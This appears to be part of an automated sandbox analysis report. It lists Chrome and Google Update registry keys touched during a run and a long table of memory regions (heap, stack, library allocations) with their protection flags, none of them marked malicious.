nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
There are 42 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2540CF44000
|
heap
|
page read and write
|
|
|
|
2540CF60000
|
heap
|
page read and write
|
|
|
|
2852AF02000
|
heap
|
page read and write
|
||
|
B23B077000
|
stack
|
page read and write
|
||
|
23E5A2CE000
|
heap
|
page read and write
|
||
|
2540CFFF000
|
heap
|
page read and write
|
||
|
2852B024000
|
trusted library allocation
|
page read and write
|
||
|
1D38A950000
|
remote allocation
|
page read and write
|
||
|
2852AEDD000
|
heap
|
page read and write
|
||
|
25A3D77F000
|
heap
|
page read and write
|
||
|
1D38A0C9000
|
heap
|
page read and write
|
||
|
ECB667B000
|
stack
|
page read and write
|
||
|
14AC5FF000
|
stack
|
page read and write
|
||
|
1B1D446C000
|
heap
|
page read and write
|
||
|
2540CD80000
|
heap
|
page read and write
|
||
|
14AC1FB000
|
stack
|
page read and write
|
||
|
2852619B000
|
heap
|
page read and write
|
||
|
2ABF4E53000
|
heap
|
page read and write
|
||
|
23E5AFC0000
|
trusted library allocation
|
page read and write
|
||
|
2852AEAD000
|
heap
|
page read and write
|
||
|
23C1C508000
|
heap
|
page read and write
|
||
|
1D38A029000
|
heap
|
page read and write
|
||
|
2852AD3F000
|
trusted library allocation
|
page read and write
|
||
|
28525613000
|
heap
|
page read and write
|
||
|
25A3D765000
|
heap
|
page read and write
|
||
|
2852B070000
|
trusted library allocation
|
page read and write
|
||
|
2852AEF6000
|
heap
|
page read and write
|
||
|
ECB61F7000
|
stack
|
page read and write
|
||
|
2852C010000
|
heap
|
page read and write
|
||
|
1D38A0E4000
|
heap
|
page read and write
|
||
|
23E5A291000
|
heap
|
page read and write
|
||
|
2852AD50000
|
trusted library allocation
|
page read and write
|
||
|
1D38B000000
|
heap
|
page read and write
|
||
|
1D38A049000
|
heap
|
page read and write
|
||
|
16D5567B000
|
heap
|
page read and write
|
||
|
2852AF02000
|
heap
|
page read and write
|
||
|
14AC0FC000
|
stack
|
page read and write
|
||
|
2ABF4CA0000
|
heap
|
page read and write
|
||
|
ECB6E7C000
|
stack
|
page read and write
|
||
|
1D38AB1A000
|
heap
|
page read and write
|
||
|
28525641000
|
heap
|
page read and write
|
||
|
2852AF09000
|
heap
|
page read and write
|
||
|
2ABF4F13000
|
heap
|
page read and write
|
||
|
23C1C3D0000
|
heap
|
page read and write
|
||
|
23E5A2EA000
|
heap
|
page read and write
|
||
|
1D38AB88000
|
heap
|
page read and write
|
||
|
1D38AB86000
|
heap
|
page read and write
|
||
|
25A3D756000
|
heap
|
page read and write
|
||
|
DD13EFE000
|
stack
|
page read and write
|
||
|
ECB69FF000
|
stack
|
page read and write
|
||
|
1D38A048000
|
heap
|
page read and write
|
||
|
1D38A03C000
|
heap
|
page read and write
|
||
|
2540E900000
|
heap
|
page read and write
|
||
|
1D38B018000
|
heap
|
page read and write
|
||
|
2852B1D0000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB5B000
|
heap
|
page read and write
|
||
|
2852619C000
|
heap
|
page read and write
|
||
|
25A3D76E000
|
heap
|
page read and write
|
||
|
2540CF4E000
|
heap
|
page read and write
|
||
|
285267D0000
|
trusted library section
|
page readonly
|
||
|
1D38AB71000
|
heap
|
page read and write
|
||
|
2ABF4C90000
|
heap
|
page read and write
|
||
|
2540ED50000
|
heap
|
page read and write
|
||
|
1D38AB7D000
|
heap
|
page read and write
|
||
|
1D38A050000
|
heap
|
page read and write
|
||
|
1B1D4C02000
|
trusted library allocation
|
page read and write
|
||
|
14ABD6E000
|
stack
|
page read and write
|
||
|
64EE5FE000
|
stack
|
page read and write
|
||
|
28526201000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB9F000
|
heap
|
page read and write
|
||
|
1D38A04D000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
14ABDEF000
|
stack
|
page read and write
|
||
|
1D38AB6E000
|
heap
|
page read and write
|
||
|
25A3D751000
|
heap
|
page read and write
|
||
|
1D38AB8A000
|
heap
|
page read and write
|
||
|
64EE4FB000
|
stack
|
page read and write
|
||
|
28526118000
|
heap
|
page read and write
|
||
|
2540ED70000
|
heap
|
page read and write
|
||
|
1D38AB22000
|
heap
|
page read and write
|
||
|
285267C0000
|
trusted library section
|
page readonly
|
||
|
2ABF4E29000
|
heap
|
page read and write
|
||
|
1D389F80000
|
heap
|
page read and write
|
||
|
2ABF4E60000
|
heap
|
page read and write
|
||
|
1D38AB99000
|
heap
|
page read and write
|
||
|
DDF59FB000
|
stack
|
page read and write
|
||
|
28526100000
|
heap
|
page read and write
|
||
|
2852B040000
|
trusted library allocation
|
page read and write
|
||
|
1D38A0FD000
|
heap
|
page read and write
|
||
|
25A3D785000
|
heap
|
page read and write
|
||
|
23C1C513000
|
heap
|
page read and write
|
||
|
2ABF4E02000
|
heap
|
page read and write
|
||
|
DD13E7F000
|
stack
|
page read and write
|
||
|
1D38B021000
|
heap
|
page read and write
|
||
|
28525FF3000
|
trusted library allocation
|
page read and write
|
||
|
1D389F90000
|
heap
|
page read and write
|
||
|
B23B17F000
|
stack
|
page read and write
|
||
|
1D38A116000
|
heap
|
page read and write
|
||
|
DDF553E000
|
stack
|
page read and write
|
||
|
23E5B200000
|
trusted library allocation
|
page read and write
|
||
|
16D55702000
|
heap
|
page read and write
|
||
|
1B1D4402000
|
heap
|
page read and write
|
||
|
16D55670000
|
heap
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
1D38AB83000
|
heap
|
page read and write
|
||
|
28526118000
|
heap
|
page read and write
|
||
|
28526159000
|
heap
|
page read and write
|
||
|
1D38A013000
|
heap
|
page read and write
|
||
|
28525580000
|
heap
|
page read and write
|
||
|
5CF67FF000
|
stack
|
page read and write
|
||
|
285255C0000
|
trusted library section
|
page read and write
|
||
|
23E5A170000
|
heap
|
page read and write
|
||
|
1D38ABA5000
|
heap
|
page read and write
|
||
|
DD13FFF000
|
stack
|
page read and write
|
||
|
2852567B000
|
heap
|
page read and write
|
||
|
1D38A0B3000
|
heap
|
page read and write
|
||
|
254104E4000
|
heap
|
page read and write
|
||
|
2852AD20000
|
trusted library allocation
|
page read and write
|
||
|
2852B060000
|
trusted library allocation
|
page read and write
|
||
|
2852AD60000
|
trusted library allocation
|
page read and write
|
||
|
25A3D785000
|
heap
|
page read and write
|
||
|
28526158000
|
heap
|
page read and write
|
||
|
2852AF0B000
|
heap
|
page read and write
|
||
|
28526015000
|
heap
|
page read and write
|
||
|
ECB67FF000
|
stack
|
page read and write
|
||
|
1D38ABA3000
|
heap
|
page read and write
|
||
|
28525713000
|
heap
|
page read and write
|
||
|
2852AF12000
|
heap
|
page read and write
|
||
|
285261DB000
|
heap
|
page read and write
|
||
|
2ABF4E00000
|
heap
|
page read and write
|
||
|
64EE6FF000
|
stack
|
page read and write
|
||
|
16D55713000
|
heap
|
page read and write
|
||
|
1D38B018000
|
heap
|
page read and write
|
||
|
1D38AB81000
|
heap
|
page read and write
|
||
|
5CF66FE000
|
stack
|
page read and write
|
||
|
1D38AB81000
|
heap
|
page read and write
|
||
|
B23ACFF000
|
stack
|
page read and write
|
||
|
28526108000
|
heap
|
page read and write
|
||
|
2852AE63000
|
heap
|
page read and write
|
||
|
2852AF0E000
|
heap
|
page read and write
|
||
|
2852AEFA000
|
heap
|
page read and write
|
||
|
25A3D76E000
|
heap
|
page read and write
|
||
|
1B1D4502000
|
heap
|
page read and write
|
||
|
1D38A108000
|
heap
|
page read and write
|
||
|
23E5AF40000
|
trusted library allocation
|
page read and write
|
||
|
25A3DA10000
|
heap
|
page read and write
|
||
|
285266E0000
|
trusted library allocation
|
page read and write
|
||
|
DDF54BC000
|
stack
|
page read and write
|
||
|
ECB6379000
|
stack
|
page read and write
|
||
|
2852AD60000
|
trusted library allocation
|
page read and write
|
||
|
23C1C502000
|
heap
|
page read and write
|
||
|
25A3D76E000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
1D38AB6F000
|
heap
|
page read and write
|
||
|
1D38AB7D000
|
heap
|
page read and write
|
||
|
2540D016000
|
heap
|
page read and write
|
||
|
954995C000
|
stack
|
page read and write
|
||
|
ECB60FE000
|
stack
|
page read and write
|
||
|
2540CEC0000
|
heap
|
page read and write
|
||
|
1B1D4500000
|
heap
|
page read and write
|
||
|
23C1C45C000
|
heap
|
page read and write
|
||
|
2852AEA5000
|
heap
|
page read and write
|
||
|
2540CFA7000
|
heap
|
page read and write
|
||
|
2852AF0B000
|
heap
|
page read and write
|
||
|
1D38AB7F000
|
heap
|
page read and write
|
||
|
28525520000
|
heap
|
page read and write
|
||
|
1D38AB8A000
|
heap
|
page read and write
|
||
|
2ABF4D00000
|
heap
|
page read and write
|
||
|
969D67E000
|
stack
|
page read and write
|
||
|
2852AEED000
|
heap
|
page read and write
|
||
|
1D38AB7D000
|
heap
|
page read and write
|
||
|
2540CFA3000
|
heap
|
page read and write
|
||
|
1D38AB9F000
|
heap
|
page read and write
|
||
|
16D5564D000
|
heap
|
page read and write
|
||
|
DDF5CFF000
|
stack
|
page read and write
|
||
|
2852B090000
|
trusted library allocation
|
page read and write
|
||
|
2852B080000
|
remote allocation
|
page read and write
|
||
|
B23AC7C000
|
stack
|
page read and write
|
||
|
1B1D4513000
|
heap
|
page read and write
|
||
|
28526000000
|
heap
|
page read and write
|
||
|
1B1D4428000
|
heap
|
page read and write
|
||
|
2852B000000
|
trusted library allocation
|
page read and write
|
||
|
28526118000
|
heap
|
page read and write
|
||
|
ECB697F000
|
stack
|
page read and write
|
||
|
28526118000
|
heap
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
1D38A0EA000
|
heap
|
page read and write
|
||
|
16D5568D000
|
heap
|
page read and write
|
||
|
ECB5DCC000
|
stack
|
page read and write
|
||
|
28526B80000
|
trusted library allocation
|
page read and write
|
||
|
1B1D4453000
|
heap
|
page read and write
|
||
|
23E5B280000
|
trusted library allocation
|
page read and write
|
||
|
2852B1C0000
|
trusted library allocation
|
page read and write
|
||
|
1D38A000000
|
heap
|
page read and write
|
||
|
16D55650000
|
heap
|
page read and write
|
||
|
254104FC000
|
heap
|
page read and write
|
||
|
16D55629000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
1D38ABA8000
|
heap
|
page read and write
|
||
|
1D38ABAE000
|
heap
|
page read and write
|
||
|
1D38AB80000
|
heap
|
page read and write
|
||
|
16D55600000
|
heap
|
page read and write
|
||
|
5CF65FF000
|
stack
|
page read and write
|
||
|
2852AF12000
|
heap
|
page read and write
|
||
|
1D38AB83000
|
heap
|
page read and write
|
||
|
2540E8E0000
|
heap
|
page read and write
|
||
|
64EDFFB000
|
stack
|
page read and write
|
||
|
9549C7F000
|
stack
|
page read and write
|
||
|
2540E904000
|
heap
|
page read and write
|
||
|
1D38AB91000
|
heap
|
page read and write
|
||
|
9549FF7000
|
stack
|
page read and write
|
||
|
1D38ABAC000
|
heap
|
page read and write
|
||
|
5CF677E000
|
stack
|
page read and write
|
||
|
2ABF55A0000
|
trusted library allocation
|
page read and write
|
||
|
2852B030000
|
trusted library allocation
|
page read and write
|
||
|
1B1D4270000
|
heap
|
page read and write
|
||
|
2852AD50000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB84000
|
heap
|
page read and write
|
||
|
1D38A102000
|
heap
|
page read and write
|
||
|
2852C000000
|
heap
|
page read and write
|
||
|
16D55E02000
|
trusted library allocation
|
page read and write
|
||
|
2852568D000
|
heap
|
page read and write
|
||
|
2852AB80000
|
trusted library allocation
|
page read and write
|
||
|
2852AD30000
|
trusted library allocation
|
page read and write
|
||
|
2ABF4F00000
|
heap
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
254104FC000
|
heap
|
page read and write
|
||
|
254104D0000
|
heap
|
page read and write
|
||
|
1D38AB86000
|
heap
|
page read and write
|
||
|
DD13BFA000
|
stack
|
page read and write
|
||
|
23E5A180000
|
trusted library allocation
|
page read and write
|
||
|
23C1C45E000
|
heap
|
page read and write
|
||
|
28526158000
|
heap
|
page read and write
|
||
|
2852B050000
|
trusted library allocation
|
page read and write
|
||
|
23C1C370000
|
heap
|
page read and write
|
||
|
DDF58FB000
|
stack
|
page read and write
|
||
|
ECB68FA000
|
stack
|
page read and write
|
||
|
2852AF17000
|
heap
|
page read and write
|
||
|
25A3D6C0000
|
heap
|
page read and write
|
||
|
16D5563C000
|
heap
|
page read and write
|
||
|
16D554F0000
|
heap
|
page read and write
|
||
|
2852AE20000
|
heap
|
page read and write
|
||
|
1D38A04B000
|
heap
|
page read and write
|
||
|
ECB6A7E000
|
stack
|
page read and write
|
||
|
2ABF5602000
|
trusted library allocation
|
page read and write
|
||
|
2852AE4A000
|
heap
|
page read and write
|
||
|
B23B27F000
|
stack
|
page read and write
|
||
|
1B1D446C000
|
heap
|
page read and write
|
||
|
2852AD37000
|
trusted library allocation
|
page read and write
|
||
|
1D38ABB0000
|
heap
|
page read and write
|
||
|
1D38AB73000
|
heap
|
page read and write
|
||
|
16D55490000
|
heap
|
page read and write
|
||
|
23E5B230000
|
trusted library allocation
|
page read and write
|
||
|
1B1D4400000
|
heap
|
page read and write
|
||
|
28525673000
|
heap
|
page read and write
|
||
|
DD13F78000
|
stack
|
page read and write
|
||
|
ECB6C7E000
|
stack
|
page read and write
|
||
|
1D38A113000
|
heap
|
page read and write
|
||
|
1D38AB88000
|
heap
|
page read and write
|
||
|
DDF5BFC000
|
stack
|
page read and write
|
||
|
23C1C402000
|
heap
|
page read and write
|
||
|
1D38B044000
|
heap
|
page read and write
|
||
|
1D38AB81000
|
heap
|
page read and write
|
||
|
2852B080000
|
remote allocation
|
page read and write
|
||
|
ECB66FF000
|
stack
|
page read and write
|
||
|
23C1C461000
|
heap
|
page read and write
|
||
|
23C1C400000
|
heap
|
page read and write
|
||
|
2852AD64000
|
trusted library allocation
|
page read and write
|
||
|
2852AB90000
|
trusted library allocation
|
page read and write
|
||
|
2852AE3D000
|
heap
|
page read and write
|
||
|
25A3D785000
|
heap
|
page read and write
|
||
|
2852B00E000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB7D000
|
heap
|
page read and write
|
||
|
2852AD35000
|
trusted library allocation
|
page read and write
|
||
|
25A3D740000
|
heap
|
page read and write
|
||
|
28526002000
|
heap
|
page read and write
|
||
|
2540D012000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
28526113000
|
heap
|
page read and write
|
||
|
2852AF1C000
|
heap
|
page read and write
|
||
|
1D38AB18000
|
heap
|
page read and write
|
||
|
25A3D767000
|
heap
|
page read and write
|
||
|
2852B021000
|
trusted library allocation
|
page read and write
|
||
|
23E5A2E4000
|
heap
|
page read and write
|
||
|
2ABF4E7F000
|
heap
|
page read and write
|
||
|
2852AEF8000
|
heap
|
page read and write
|
||
|
2852AD20000
|
trusted library allocation
|
page read and write
|
||
|
ECB657F000
|
stack
|
page read and write
|
||
|
95499DE000
|
stack
|
page read and write
|
||
|
23C1C500000
|
heap
|
page read and write
|
||
|
25411C70000
|
trusted library allocation
|
page read and write
|
||
|
14AC4FC000
|
stack
|
page read and write
|
||
|
14AC2F7000
|
stack
|
page read and write
|
||
|
25A3D756000
|
heap
|
page read and write
|
||
|
1D38ABD2000
|
heap
|
page read and write
|
||
|
1D38AB71000
|
heap
|
page read and write
|
||
|
16D5564B000
|
heap
|
page read and write
|
||
|
2540D039000
|
heap
|
page read and write
|
||
|
2540D038000
|
heap
|
page read and write
|
||
|
2852AC10000
|
trusted library allocation
|
page read and write
|
||
|
23C1C360000
|
heap
|
page read and write
|
||
|
2ABF4F08000
|
heap
|
page read and write
|
||
|
1D38AB83000
|
heap
|
page read and write
|
||
|
969D579000
|
stack
|
page read and write
|
||
|
ECB647A000
|
stack
|
page read and write
|
||
|
28525693000
|
heap
|
page read and write
|
||
|
1D38AB81000
|
heap
|
page read and write
|
||
|
1D38AB92000
|
heap
|
page read and write
|
||
|
1B1D42E0000
|
heap
|
page read and write
|
||
|
9549EF8000
|
stack
|
page read and write
|
||
|
2ABF4E67000
|
heap
|
page read and write
|
||
|
23C1C464000
|
heap
|
page read and write
|
||
|
2852AD31000
|
trusted library allocation
|
page read and write
|
||
|
23E5A2CD000
|
heap
|
page read and write
|
||
|
23C1CE02000
|
trusted library allocation
|
page read and write
|
||
|
2540CF40000
|
heap
|
page read and write
|
||
|
2852AF12000
|
heap
|
page read and write
|
||
|
2ABF4E5D000
|
heap
|
page read and write
|
||
|
2ABF4E13000
|
heap
|
page read and write
|
||
|
16D55700000
|
heap
|
page read and write
|
||
|
2852AF02000
|
heap
|
page read and write
|
||
|
1D38ABAA000
|
heap
|
page read and write
|
||
|
23C1C488000
|
heap
|
page read and write
|
||
|
1D38A081000
|
heap
|
page read and write
|
||
|
9549DFE000
|
stack
|
page read and write
|
||
|
1D38AB4E000
|
heap
|
page read and write
|
||
|
2852567D000
|
heap
|
page read and write
|
||
|
1D38A0ED000
|
heap
|
page read and write
|
||
|
254104FC000
|
heap
|
page read and write
|
||
|
25A3D6E0000
|
heap
|
page read and write
|
||
|
1D38A890000
|
trusted library allocation
|
page read and write
|
||
|
1D38A071000
|
heap
|
page read and write
|
||
|
64EE7FB000
|
stack
|
page read and write
|
||
|
28525600000
|
heap
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
ECB607D000
|
stack
|
page read and write
|
||
|
2852AD3C000
|
trusted library allocation
|
page read and write
|
||
|
1D38A950000
|
remote allocation
|
page read and write
|
||
|
23E5A219000
|
heap
|
page read and write
|
||
|
1B1D4280000
|
heap
|
page read and write
|
||
|
DDF55BE000
|
stack
|
page read and write
|
||
|
1D38AB71000
|
heap
|
page read and write
|
||
|
1D38A950000
|
remote allocation
|
page read and write
|
||
|
2ABF4E8A000
|
heap
|
page read and write
|
||
|
2852ABC3000
|
trusted library allocation
|
page read and write
|
||
|
954A378000
|
stack
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
16D55480000
|
heap
|
page read and write
|
||
|
1D38AB97000
|
heap
|
page read and write
|
||
|
2852AD31000
|
trusted library allocation
|
page read and write
|
||
|
28525678000
|
heap
|
page read and write
|
||
|
1D389FF0000
|
heap
|
page read and write
|
||
|
25A3DA15000
|
heap
|
page read and write
|
||
|
1D38A0C2000
|
heap
|
page read and write
|
||
|
28525702000
|
heap
|
page read and write
|
||
|
1D38ABA8000
|
heap
|
page read and write
|
||
|
1D38B01A000
|
heap
|
page read and write
|
||
|
2852AF06000
|
heap
|
page read and write
|
||
|
2852AE2E000
|
heap
|
page read and write
|
||
|
23C1C429000
|
heap
|
page read and write
|
||
|
1D38AB8A000
|
heap
|
page read and write
|
||
|
28526118000
|
heap
|
page read and write
|
||
|
23C1C43C000
|
heap
|
page read and write
|
||
|
1B1D4413000
|
heap
|
page read and write
|
||
|
1D38AB7D000
|
heap
|
page read and write
|
||
|
23E5B220000
|
trusted library allocation
|
page read and write
|
||
|
16D55653000
|
heap
|
page read and write
|
||
|
285255B0000
|
trusted library allocation
|
page read and write
|
||
|
2852AE00000
|
heap
|
page read and write
|
||
|
1D38A04C000
|
heap
|
page read and write
|
||
|
1D38ABB7000
|
heap
|
page read and write
|
||
|
2852AF0B000
|
heap
|
page read and write
|
||
|
2852AEF8000
|
heap
|
page read and write
|
||
|
25A3D77E000
|
heap
|
page read and write
|
||
|
1D38A0A8000
|
heap
|
page read and write
|
||
|
969D6F9000
|
stack
|
page read and write
|
||
|
23E5A289000
|
heap
|
page read and write
|
||
|
1B1D4477000
|
heap
|
page read and write
|
||
|
28525510000
|
heap
|
page read and write
|
||
|
1D38AB9F000
|
heap
|
page read and write
|
||
|
1D38ABAD000
|
heap
|
page read and write
|
||
|
2ABF4F02000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
23C1C468000
|
heap
|
page read and write
|
||
|
1D38ABA3000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
14AC3FE000
|
stack
|
page read and write
|
||
|
2540D004000
|
heap
|
page read and write
|
||
|
2852AE10000
|
heap
|
page read and write
|
||
|
2852B230000
|
trusted library allocation
|
page read and write
|
||
|
28526810000
|
trusted library section
|
page readonly
|
||
|
23E5A220000
|
heap
|
page read and write
|
||
|
DDF5AF7000
|
stack
|
page read and write
|
||
|
25A3D590000
|
heap
|
page read and write
|
||
|
23C1C413000
|
heap
|
page read and write
|
||
|
2852619C000
|
heap
|
page read and write
|
||
|
254104D1000
|
heap
|
page read and write
|
||
|
1D38ABA4000
|
heap
|
page read and write
|
||
|
954A0F7000
|
stack
|
page read and write
|
||
|
2852AD30000
|
trusted library allocation
|
page read and write
|
||
|
1D38ABA8000
|
heap
|
page read and write
|
||
|
23E5AF50000
|
trusted library allocation
|
page read and write
|
||
|
25A3D763000
|
heap
|
page read and write
|
||
|
1D38AB81000
|
heap
|
page read and write
|
||
|
2540CF69000
|
heap
|
page read and write
|
||
|
285256FF000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
23E5AFB0000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB5F000
|
heap
|
page read and write
|
||
|
1D38AB88000
|
heap
|
page read and write
|
||
|
2540D04C000
|
heap
|
page read and write
|
||
|
969D5FD000
|
stack
|
page read and write
|
||
|
2852AD30000
|
trusted library allocation
|
page read and write
|
||
|
16D55708000
|
heap
|
page read and write
|
||
|
1D38ABAE000
|
heap
|
page read and write
|
||
|
2852ABC0000
|
trusted library allocation
|
page read and write
|
||
|
28526800000
|
trusted library section
|
page readonly
|
||
|
2ABF4E62000
|
heap
|
page read and write
|
||
|
2540D04C000
|
heap
|
page read and write
|
||
|
1D38B021000
|
heap
|
page read and write
|
||
|
64EE27F000
|
stack
|
page read and write
|
||
|
23E5A2CC000
|
heap
|
page read and write
|
||
|
23E5A280000
|
heap
|
page read and write
|
||
|
ECB677E000
|
stack
|
page read and write
|
||
|
23E5A2C5000
|
heap
|
page read and write
|
||
|
1D38A0ED000
|
heap
|
page read and write
|
||
|
1D38AB00000
|
heap
|
page read and write
|
||
|
285267F0000
|
trusted library section
|
page readonly
|
||
|
2852B080000
|
remote allocation
|
page read and write
|
||
|
1D38AB8E000
|
heap
|
page read and write
|
||
|
1D38AB92000
|
heap
|
page read and write
|
||
|
2852AF0B000
|
heap
|
page read and write
|
||
|
2852610B000
|
heap
|
page read and write
|
||
|
25A3D785000
|
heap
|
page read and write
|
||
|
1B1D4440000
|
heap
|
page read and write
|
||
|
16D55686000
|
heap
|
page read and write
|
||
|
969D19C000
|
stack
|
page read and write
|
||
|
1D38ABC7000
|
heap
|
page read and write
|
||
|
2852619A000
|
heap
|
page read and write
|
||
|
16D55613000
|
heap
|
page read and write
|
||
|
1D38AB83000
|
heap
|
page read and write
|
||
|
2852ADF0000
|
trusted library allocation
|
page read and write
|
||
|
16D55656000
|
heap
|
page read and write
|
||
|
1D38AB6F000
|
heap
|
page read and write
|
||
|
954A27E000
|
unkown
|
page read and write
|
||
|
25A3D766000
|
heap
|
page read and write
|
||
|
2852AF07000
|
heap
|
page read and write
|
||
|
1B1D43E0000
|
trusted library allocation
|
page read and write
|
||
|
285261DB000
|
heap
|
page read and write
|
||
|
16D555F0000
|
trusted library allocation
|
page read and write
|
||
|
B23AE7C000
|
stack
|
page read and write
|
||
|
28525629000
|
heap
|
page read and write
|
||
|
2540CEE0000
|
heap
|
page read and write
|
||
|
2ABF4E3C000
|
heap
|
page read and write
|
||
|
1D38ABBB000
|
heap
|
page read and write
|
||
|
23E5A1E0000
|
heap
|
page read and write
|
||
|
1D38AB9B000
|
heap
|
page read and write
|
||
|
2852ABA0000
|
trusted library allocation
|
page read and write
|
||
|
5CF667E000
|
stack
|
page read and write
|
||
|
28525656000
|
heap
|
page read and write
|
||
|
1D38A04F000
|
heap
|
page read and write
|
||
|
28526500000
|
trusted library allocation
|
page read and write
|
||
|
1D38AB76000
|
heap
|
page read and write
|
||
|
2852AC00000
|
trusted library allocation
|
page read and write
|
||
|
23C1CC70000
|
trusted library allocation
|
page read and write
|
||
|
23C1C44D000
|
heap
|
page read and write
|
||
|
28526B61000
|
trusted library allocation
|
page read and write
|
||
|
B23AD7F000
|
stack
|
page read and write
|
||
|
28525FF0000
|
trusted library allocation
|
page read and write
|
||
|
2852AF1D000
|
heap
|
page read and write
|
||
|
1D38B002000
|
heap
|
page read and write
|
||
|
DD140FC000
|
stack
|
page read and write
|
||
|
14ABCEB000
|
stack
|
page read and write
|
||
|
23E5A450000
|
trusted library allocation
|
page read and write
|
||
|
2852B008000
|
trusted library allocation
|
page read and write
|
||
|
954A1FE000
|
stack
|
page read and write
|
||
|
2852AD3B000
|
trusted library allocation
|
page read and write
|
||
|
1D38B01A000
|
heap
|
page read and write
|
||
|
B23AF7B000
|
stack
|
page read and write
|
||
|
1D38AB59000
|
heap
|
page read and write
|
||
|
23E5A2E0000
|
heap
|
page read and write
|
||
|
DD1407F000
|
stack
|
page read and write
|
||
|
2852AF02000
|
heap
|
page read and write
|
||
|
23E5A210000
|
heap
|
page read and write
|
||
|
23E5A2CD000
|
heap
|
page read and write
|
||
|
1D38A0A9000
|
heap
|
page read and write
|
||
|
1D38ABA4000
|
heap
|
page read and write
|
||
|
23E5A215000
|
heap
|
page read and write
|
||
|
2540D008000
|
heap
|
page read and write
|
||
|
2852569E000
|
heap
|
page read and write
|
||
|
23C1C45F000
|
heap
|
page read and write
|
||
|
2852AF0A000
|
heap
|
page read and write
|
||
|
285267E0000
|
trusted library section
|
page readonly
|
